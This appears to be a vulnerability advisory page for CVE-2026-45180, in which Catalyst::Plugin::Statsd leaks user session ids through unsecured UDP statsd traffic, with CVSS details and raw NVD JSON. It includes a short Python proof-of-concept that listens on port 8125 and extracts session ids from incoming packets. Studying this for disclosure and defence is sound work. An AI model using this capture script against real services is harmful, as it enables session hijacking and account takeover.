Security Vulnerability Report
CVE-2026-45180 CVSS 7.5 HIGH

Published: 2026-05-10 21:16:29
Last Modified: 2026-05-12 16:48:58
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Catalyst::Plugin::Statsd versions through 0.10.0 for Perl may leak session ids. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' session ids may be leaked. This may allow an attacker to use session ids as authentication tokens.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Catalyst::Plugin::Statsd <= 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# This script simulates an attacker sniffing network traffic to capture leaked
# session IDs via UDP. It listens on the standard statsd port (8125).
import re
import socket

# Configuration
UDP_IP = "0.0.0.0"
UDP_PORT = 8125

# Regex pattern to simulate matching a session ID (e.g., a hex string)
SESSION_ID_PATTERN = re.compile(r"session_id=([a-f0-9]+)", re.IGNORECASE)


def sniff_statsd_traffic():
    # Create a UDP socket and bind it to the statsd port
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((UDP_IP, UDP_PORT))
    print(f"[*] Listening for UDP packets on port {UDP_PORT}...")

    try:
        while True:
            try:
                # Receive one datagram (buffer size 1024 bytes)
                data, addr = sock.recvfrom(1024)
                message = data.decode("utf-8", errors="ignore")

                # Check whether the packet contains sensitive info
                match = SESSION_ID_PATTERN.search(message)
                if match:
                    captured_sid = match.group(1)
                    print(f"[!] Potential session ID captured from {addr}: {captured_sid}")
                    print(f"    Payload: {message}")
                else:
                    print(f"[+] Received stats from {addr}: {message}")
            except KeyboardInterrupt:
                print("\n[*] Stopping sniffing.")
                break
            except Exception as e:
                print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    sniff_statsd_traffic()
```

References

- https://github.com/robrwo/CatalystX-Statsd/security/advisories/GHSA-gjvr-hq83-fc38
- https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx
- https://metacpan.org/release/RRWO/Catalyst-Plugin-Statsd-v0.10.0/changes
- https://www.cve.org/CVERecord?id=CVE-2026-45179

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-45180",
    "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
    "published": "2026-05-10T21:16:29.170",
    "lastModified": "2026-05-12T16:48:58.260",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Catalyst::Plugin::Statsd versions through 0.10.0 for Perl may leak session ids.\n\nIf the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' session ids may be leaked. This may allow an attacker to use session ids as authentication tokens."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-319"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/robrwo/CatalystX-Statsd/security/advisories/GHSA-gjvr-hq83-fc38",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "https://metacpan.org/release/RRWO/Catalyst-Plugin-Statsd-v0.10.0/changes",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "https://www.cve.org/CVERecord?id=CVE-2026-45179",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      }
    ]
  }
}
```